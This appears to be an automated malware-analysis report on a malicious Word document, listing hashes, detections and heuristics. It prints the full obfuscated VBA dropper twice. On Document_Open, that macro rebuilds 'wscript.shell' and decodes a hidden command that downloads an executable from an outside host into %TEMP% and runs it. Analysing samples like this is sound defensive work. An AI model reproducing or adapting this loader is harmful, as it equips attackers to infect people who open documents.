Office (OLE) malware analysis — malicious · 4bcd65296d8e336b

MALICIOUS

Office (OLE)

91.0 KB Created: 2017-01-19 15:05:00 Authoring application: Microsoft Office Word First seen: 2017-02-23

MD5: b4c690e70f33282f525d3efaf86b7150 SHA-1: 6b2ed6af8138e4e363848395ac4fff41c092bbc0 SHA-256: 4bcd65296d8e336badf54b91a8e92eb1ca5a3916e3b400c5dbf9dee49e025330

230 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic

The sample is a Microsoft Word document containing a malicious VBA macro. The macro is obfuscated and uses CreateObject to execute commands, indicating it's designed to download and run a second-stage payload. The ClamAV detection 'Doc.Dropper.Agent-5684006-0' further supports this dropper functionality. The macro attempts to execute a PowerShell command, which is likely used to fetch and execute the payload.

Heuristics 7

ClamAV: Doc.Dropper.Agent-5684006-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-5684006-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
Matched line in script
```
'baconcaught salgattawgslgvwcxur
Set nejgysjqgqjmro = CreateObject(Join(dieselstill, ""))
'vkhnplvncpl umiycugqog
```

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

'baconcaught salgattawgslgvwcxur
Set nejgysjqgqjmro = CreateObject(Join(dieselstill, ""))
'vkhnplvncpl umiycugqog

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro

Matched line in script

Attribute VB_Customizable = True
Public Sub Document_Open()
hobbyritual = "Jwk qhAJi3d9Qd3eQJnq Q-6nQ3oAXp9 3-kXeqp68 q9b3QyAXp6aAQs9Qs3 6(JqNqkeQ3wX-38OqbXj3eQc8t39 X6SAQy3sX9t8Ae6mX8.86N9eQtk.qW6eQXb9C3lkiXXeJnJ8tX)kq.X9D9oQXwQn9l3o9aAd36FAi6JlA6eQk(3Q'Q3hQt3qtXpQXs6:qq/k/9Xdk3.kfXi36lJeQb8oAAxX.33mqokQe6q/AAjQQz3wJs69i9bX.3QeAAxqQek'QQ,J'q%AT6E3qMXPX%A3\QX\Aqjkz6Xw8sXiqbX.Qe3x9e9'3Q)kk X&Ak QQr8ekAgXQ AQakdJ6d8 XH3KqqCkqU9\JA\QSQJo9fAAtXQwQaXQrQ9eQ\k\3C6klAqaksqJs6Xe3sk6\Xk\QmJ9s6cqf3ki3l9eQQ\kk\As3Jh9eJlXlqq\3\QoQpXXe8JnX3\Qk\Q6cQo3AmXmJaA6nQdkk QX/8 …

Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/camera-raw-settings/1.0/In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://www.iec.chIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4157 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	4157 bytes
SHA-256: `807c45ffcfbb0f262ab9776c431a69e59783d1c7898cbe8cdf4adf58be670c76`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Public Sub Document_Open() hobbyritual = "Jwk qhAJi3d9Qd3eQJnq Q-6nQ3oAXp9 3-kXeqp68 q9b3QyAXp6aAQs9Qs3 6(JqNqkeQ3wX-38OqbXj3eQc8t39 X6SAQy3sX9t8Ae6mX8.86N9eQtk.qW6eQXb9C3lkiXXeJnJ8tX)kq.X9D9oQXwQn9l3o9aAd36FAi6JlA6eQk(3Q'Q3hQt3qtXpQXs6:qq/k/9Xdk3.kfXi36lJeQb8oAAxX.33mqokQe6q/AAjQQz3wJs69i9bX.3QeAAxqQek'QQ,J'q%AT6E3qMXPX%A3\QX\Aqjkz6Xw8sXiqbX.Qe3x9e9'3Q)kk X&Ak QQr8ekAgXQ AQakdJ6d8 XH3KqqCkqU9\JA\QSQJo9fAAtXQwQaXQrQ9eQ\k\3C6klAqaksqJs6Xe3sk6\Xk\QmJ9s6cqf3ki3l9eQQ\kk\As3Jh9eJlXlqq\3\QoQpXXe8JnX3\Qk\Q6cQo3AmXmJaA6nQdkk QX/8d3 8J%JQTq3EQQMkP3q%3\9Q\Qqj6z8wXs8i9QbX6.qeq9xAekX A8/A9fkq kq&A 6eX8vXeknQXtQ8v9w3Qr83.3eJXx3qeJJ Q&A k3P9Ik8NQGJ Q6-9Xn3 X1695QJ 8q162AA7qX.X03X.30X9.AX1QX>A3nQuQl6 6X&X3 X%QqTQkEA" Selection.TypeText ("It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. The point of using Lorem Ipsum is that it has a more-or-less normal distribution of letters, as opposed to using 'Content here, content here', making it look like readable English." & vbCrLf) Dim wzprvluiaes As String wzprvluiaes = "wojwfvgqhrimuaxzwug" Dim ceilingrobust As Long ceilingrobust = 355 electricminute = Asc("G") - 71 jvsgyuvaujlfxfs = "6cXmqdQq.86e6QxqeJ Q9/JXck 6Qp63oJwA3e69r3JsQhXe3lQlQ3.QeXxQ9eAX kX-" jvsgyuvaujlfxfs = jvsgyuvaujlfxfs & hobbyritual & "MQQPQ9%XX\9\3j3z8Xwkks6iX3b8.8e39xQ3e" hobbyritual = "" Dim dieselstill(1 To 5) As String Dim dreamexhibit As String dreamexhibit = "giraffegreat" Dim aerobicrecipe As Long aerobicrecipe = 992 dieselstill(1) = "wsc" dieselstill(2) = "ri" dieselstill(3) = "pt.s" 'cxcphptbfz jgqfsayqx Dim blushdash As String blushdash = "tevdthznc" 'vnzlvqtuencyezcup cglvilllatgmvgo dieselstill(4) = "hel" 'morfqernj snjsrzkftbxahs Dim foxgorilla As String foxgorilla = "zpiuhfezgrguhjg" 'hobckoguceaookmaqrx crystalremove dieselstill(5) = "l" 'jubbzdpmpabzfbdksgt riufcbrryoneeugn Dim monthsoft As String monthsoft = "fingerhelmet" 'baconcaught salgattawgslgvwcxur Set nejgysjqgqjmro = CreateObject(Join(dieselstill, "")) 'vkhnplvncpl umiycugqog Dim biologyphrase As String biologyphrase = "kkkxzejcnxqo" 'akiummdmr bomblevel For drzrikdutbrjzwzpqo = 1 To Len(jvsgyuvaujlfxfs) 'tfauvhutbfxtikwzgl mvowaztrbkowvftx Dim bxcqzvyqrdcdposw As String bxcqzvyqrdcdposw = "exchangespend" 'gardenlawn hhdfglucrfjyrduvods pandarender = Mid(jvsgyuvaujlfxfs, drzrikdutbrjzwzpqo, 1) Dim hvbobzasb As String hvbobzasb = "hgjbphpwm" Dim destroyseven As Long destroyseven = 520 Dim almostsketch As String almostsketch = "emmarrqzc" Dim curtainproject As Long curtainproject = 931 gcoeuohvy = "q69QX38QAk3XJ" Like "" & pandarender & "" 'blushchase evidenceprevent Dim questionselect As String questionselect = "developskirt" 'bpqwrfdazonhtgc hjfyavadnraldb If Not gcoeuohvy Then 'castledish pqtvkxptxy Dim arguecousin As String arguecousin = "oldoutdoor" 'ovalsalon ndpwmlmagx Dim brushsecond As String brushsecond = "combinedog" Dim cinnamonpalace As Long cinnamonpalace = 737 hobbyritual = hobbyritual & pandarender 'cqtntdiijqrqsxg naturescheme Dim buffalopatch As String buffalopatch = "matswqkuizgmg" 'ppisayytdtbnfjxhkvm attracttask End If If drzrikdutbrjzwzpqo = Len(jvsgyuvaujlfxfs) Then dumbindustry = nejgysjqgqjmro.Run(hobbyritual, electricminute) 'octobervendor eklrwqtoxr Dim kdrxsfujjsydknwosi As String kdrxsfujjsydknwosi = "ohkyitoqlgsfwmhb" 'hbvaocotnnrobzcsi againmesh End If 'tenantwaste blossomrecall Dim gasppermit As String gasppermit = "adviceclock" 'aimseat peanutpudding Dim pwtpsekrkeuszdq As String pwtpsekrkeuszdq = "muffinurban" Dim awegbybpbvai As Long awegbybpbvai = 676 Next 'headhole foamsqueeze Dim tcovgbztrspspyx As String tcovgbztrspspyx = "nnykfizvhqo" 'smoudvqodmlwqjtxj enrichwave End Sub

SHA-256: 807c45ffcfbb0f262ab9776c431a69e59783d1c7898cbe8cdf4adf58be670c76

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Sub Document_Open()
hobbyritual = "Jwk qhAJi3d9Qd3eQJnq Q-6nQ3oAXp9 3-kXeqp68 q9b3QyAXp6aAQs9Qs3 6(JqNqkeQ3wX-38OqbXj3eQc8t39 X6SAQy3sX9t8Ae6mX8.86N9eQtk.qW6eQXb9C3lkiXXeJnJ8tX)kq.X9D9oQXwQn9l3o9aAd36FAi6JlA6eQk(3Q'Q3hQt3qtXpQXs6:qq/k/9Xdk3.kfXi36lJeQb8oAAxX.33mqokQe6q/AAjQQz3wJs69i9bX.3QeAAxqQek'QQ,J'q%AT6E3qMXPX%A3\QX\Aqjkz6Xw8sXiqbX.Qe3x9e9'3Q)kk X&Ak QQr8ekAgXQ AQakdJ6d8 XH3KqqCkqU9\JA\QSQJo9fAAtXQwQaXQrQ9eQ\k\3C6klAqaksqJs6Xe3sk6\Xk\QmJ9s6cqf3ki3l9eQQ\kk\As3Jh9eJlXlqq\3\QoQpXXe8JnX3\Qk\Q6cQo3AmXmJaA6nQdkk QX/8d3 8J%JQTq3EQQMkP3q%3\9Q\Qqj6z8wXs8i9QbX6.qeq9xAekX A8/A9fkq kq&A 6eX8vXeknQXtQ8v9w3Qr83.3eJXx3qeJJ Q&A k3P9Ik8NQGJ Q6-9Xn3 X1695QJ 8q162AA7qX.X03X.30X9.AX1QX>A3nQuQl6 6X&X3 X%QqTQkEA"
Selection.TypeText ("It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. The point of using Lorem Ipsum is that it has a more-or-less normal distribution of letters, as opposed to using 'Content here, content here', making it look like readable English." & vbCrLf)
Dim wzprvluiaes As String
wzprvluiaes = "wojwfvgqhrimuaxzwug"
Dim ceilingrobust As Long
ceilingrobust = 355

electricminute = Asc("G") - 71
jvsgyuvaujlfxfs = "6cXmqdQq.86e6QxqeJ Q9/JXck 6Qp63oJwA3e69r3JsQhXe3lQlQ3.QeXxQ9eAX kX-"
jvsgyuvaujlfxfs = jvsgyuvaujlfxfs & hobbyritual & "MQQPQ9%XX\9\3j3z8Xwkks6iX3b8.8e39xQ3e"
hobbyritual = ""
Dim dieselstill(1 To 5) As String
Dim dreamexhibit As String
dreamexhibit = "giraffegreat"
Dim aerobicrecipe As Long
aerobicrecipe = 992
dieselstill(1) = "wsc"
dieselstill(2) = "ri"
dieselstill(3) = "pt.s"
'cxcphptbfz jgqfsayqx
Dim blushdash As String
blushdash = "tevdthznc"
'vnzlvqtuencyezcup cglvilllatgmvgo
dieselstill(4) = "hel"
'morfqernj snjsrzkftbxahs
Dim foxgorilla As String
foxgorilla = "zpiuhfezgrguhjg"
'hobckoguceaookmaqrx crystalremove
dieselstill(5) = "l"
'jubbzdpmpabzfbdksgt riufcbrryoneeugn
Dim monthsoft As String
monthsoft = "fingerhelmet"
'baconcaught salgattawgslgvwcxur
Set nejgysjqgqjmro = CreateObject(Join(dieselstill, ""))
'vkhnplvncpl umiycugqog
Dim biologyphrase As String
biologyphrase = "kkkxzejcnxqo"
'akiummdmr bomblevel
For drzrikdutbrjzwzpqo = 1 To Len(jvsgyuvaujlfxfs)
'tfauvhutbfxtikwzgl mvowaztrbkowvftx
Dim bxcqzvyqrdcdposw As String
bxcqzvyqrdcdposw = "exchangespend"
'gardenlawn hhdfglucrfjyrduvods
pandarender = Mid(jvsgyuvaujlfxfs, drzrikdutbrjzwzpqo, 1)
Dim hvbobzasb As String
hvbobzasb = "hgjbphpwm"
Dim destroyseven As Long
destroyseven = 520
Dim almostsketch As String
almostsketch = "emmarrqzc"
Dim curtainproject As Long
curtainproject = 931
gcoeuohvy = "q69QX38QAk3XJ" Like "*" & pandarender & "*"
'blushchase evidenceprevent
Dim questionselect As String
questionselect = "developskirt"
'bpqwrfdazonhtgc hjfyavadnraldb
If Not gcoeuohvy Then
'castledish pqtvkxptxy
Dim arguecousin As String
arguecousin = "oldoutdoor"
'ovalsalon ndpwmlmagx
Dim brushsecond As String
brushsecond = "combinedog"
Dim cinnamonpalace As Long
cinnamonpalace = 737
hobbyritual = hobbyritual & pandarender
'cqtntdiijqrqsxg naturescheme
Dim buffalopatch As String
buffalopatch = "matswqkuizgmg"
'ppisayytdtbnfjxhkvm attracttask
End If
If drzrikdutbrjzwzpqo = Len(jvsgyuvaujlfxfs) Then
dumbindustry = nejgysjqgqjmro.Run(hobbyritual, electricminute)
'octobervendor eklrwqtoxr
Dim kdrxsfujjsydknwosi As String
kdrxsfujjsydknwosi = "ohkyitoqlgsfwmhb"
'hbvaocotnnrobzcsi againmesh
End If
'tenantwaste blossomrecall
Dim gasppermit As String
gasppermit = "adviceclock"
'aimseat peanutpudding
Dim pwtpsekrkeuszdq As String
pwtpsekrkeuszdq = "muffinurban"
Dim awegbybpbvai As Long
awegbybpbvai = 676
Next
'headhole foamsqueeze
Dim tcovgbztrspspyx As String
tcovgbztrspspyx = "nnykfizvhqo"
'smoudvqodmlwqjtxj enrichwave
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.